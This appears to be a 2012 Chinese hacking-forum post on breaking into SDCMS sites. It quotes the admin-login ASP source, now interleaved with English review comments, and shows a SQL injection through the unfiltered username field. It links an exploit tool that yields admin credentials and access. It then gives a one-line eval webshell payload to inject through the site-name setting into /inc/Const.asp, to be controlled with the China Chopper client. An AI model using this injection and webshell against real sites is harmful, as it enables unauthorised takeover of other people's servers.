标题: SDCMS通杀漏洞利用工具及提权拿SHELL [打印本页] 作者: admin 时间: 2012-11-9 20:57 标题: SDCMS通杀漏洞利用工具及提权拿SHELL 作者:T00LS 鬼哥
' Vulnerable file named by the post: 后台目录/index.asp (the admin directory's index.asp).
'
' Check: handles the admin login form POST.
' Order of checks as written: Check_post gate, daily failed-login limit (errnum/loginnum),
' numeric captcha against Session("SDCMSCode"), then a Sd_Admin lookup whose SQL is built
' by string concatenation. On a matching row the selected columns are copied into cookies
' and the request is sent on to sdcms_index.asp.
' Uses helpers/globals defined elsewhere and not shown on this page: Check_post, Echo,
' FilterText (shown further down the post), errnum, loginnum, Alert, died, Conn, md5,
' AddLog, GetIp, Add_Cookies, Sdcms_DataType, Go.
' (On several lines below the post's rendering shows ":died" with its ":D" eaten by a forum
' emoticon; the call is spelled as on the first occurrence.)
Sub Check
    Dim username,password,code,getcode,Rs
    ' Check_post presumably rejects submissions that did not come from the site's own form;
    ' its logic is not on this page.
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    ' FilterText mode 1 (see the function below) removes only Chr(32)/Chr(13)/Chr(10);
    ' quote characters in username reach the SQL string further down unchanged.
    username=FilterText(Trim(Request.Form("username")),1)
    ' password only ever reaches SQL as md5(password), so (assuming md5() returns hex digits)
    ' its raw characters do not influence the query text.
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    ' Daily lockout: errnum and loginnum are maintained outside this Sub; died is assumed to end the response.
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    ' Captcha must be non-empty, numeric and equal to the session value.
    ' Nothing in this Sub resets Session("SDCMSCode") after the comparison; whether it is
    ' regenerated elsewhere (so a value cannot be reused) is not visible here.
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        ' Login query built by concatenation: username is interpolated between single quotes
        ' with no quoting applied. This is the defect the post exploits; the defensive fix is a
        ' parameterised query (ADODB.Command with parameters), not more character stripping.
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            ' Selected columns are Id(0), Sdcms_Name(1), Sdcms_Pwd(2), isadmin(3), alllever(4), infolever(5).
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            ' Rs(2) is the stored Sdcms_Pwd value, so the password hash itself is written to a
            ' client-side cookie. Whether Add_Cookies marks cookies HttpOnly/Secure or signs
            ' the value is not visible here.
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            ' Second concatenated statement. Rs(0) is the row's Id; GetIp is a helper not shown
            ' here, so how it derives the address (and whether any of it is client-supplied)
            ' should be confirmed before treating this line as safe.
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            ' Automatically delete log records older than 30 days.
            ' Sdcms_DataType picks one of two date-function spellings; from the syntax the first
            ' looks like Access/Jet and the second like SQL Server (inferred, not shown on the page).
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            ' Go presumably redirects; whether it ends the response before Rs.Close runs is not visible here.
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
' Post text carried from this line: "we can see username goes through FilterText; let's look at FilterText's code".
'
' FilterText(t0, t1): returns t0 with a set of characters removed that depends on t1.
'   t1 "1"   : removes Chr(32), Chr(13), Chr(10)&Chr(10) and Chr(10) only.
'   t1 "2"   : removes control characters and most ASCII punctuation (the Chr(...) list below).
'   otherwise: the Case Else branch. As rendered on this page its Replace calls are no-ops or
'              unbalanced, so the real replacement strings (presumably HTML entities) were lost
'              in the forum rendering — confirm against the actual source.
' Afterwards any "expression" substring is rewritten. Returns "" for empty, Null or array input.
' NOTE(review): Check calls this with t1 = 1 (a number) while the labels are the strings
' "1"/"2"; the post treats that as matching Case "1". Confirm that the numeric/string
' comparison in Select Case behaves as the post assumes on the target VBScript runtime.
Function FilterText(ByVal t0,ByVal t1)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    Select Case t1
        Case "1"
            ' Whitespace handling only. The replacement strings show as "" here but as a space and
            ' line breaks later in the post, so the real values were probably lost to rendering;
            ' either way, quotes and other SQL metacharacters are not touched in this mode.
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            ' Deny-list of control and punctuation characters, removed one code point at a time.
            t0=Replace(t0,Chr(8),"")'backspace
            t0=Replace(t0,Chr(9),"")'tab (horizontal)
            t0=Replace(t0,Chr(10),"")'line feed
            t0=Replace(t0,Chr(11),"")'vertical tab
            t0=Replace(t0,Chr(12),"")'form feed
            t0=Replace(t0,Chr(13),"")'carriage return; chr(13)&chr(10) together is CRLF
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")'space
            t0=Replace(t0,Chr(33),"")'!
            t0=Replace(t0,Chr(34),"")'"
            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
            t0=Replace(t0,Chr(37),"")'%
            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
            t0=Replace(t0,Chr(60),"")'<
            t0=Replace(t0,Chr(61),"")'=
            t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'[
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
        Case Else
            ' NOTE(review): these five lines are reproduced as the forum rendered them. Replacing a
            ' character with itself does nothing, and the """ literal is unbalanced, so the entity
            ' text that was presumably here (HTML escaping of & ' " < >) did not survive rendering.
            t0=Replace(t0, "&", "&")
            t0=Replace(t0, "'", "'")
            t0=Replace(t0, """", """)
            t0=Replace(t0, "<", "<")
            t0=Replace(t0, ">", ">")
    End Select
    ' Guard against CSS "expression(...)". The replacement value looks identical in print and
    ' presumably carries an invisible character between "e" and "x" (confirm in the real source).
    ' NOTE(review): the guard lowercases t0 but Replace is called with compare=0 (binary,
    ' case-sensitive), so a mixed-case spelling passes the guard and is left unchanged; the
    ' Replace should use the same case-insensitive comparison as the guard (compare=1).
    IF Instr(Lcase(t0),"expression")>0 Then
        t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
看到没。直接参数是1 只过滤
t0=Replace(t0,Chr(32)," ")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"
")
t0=Replace(t0,Chr(10),"
")
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/,如果站长改了后台路径,那么请自行查找!
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
测试:
现在输入工具上验证码,然后点OK
看到我们直接进入后台管理界面了,呵呵!
这样直接进入后台了。。。。
SDCMS提权:
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
OK,现在用菜刀连接下!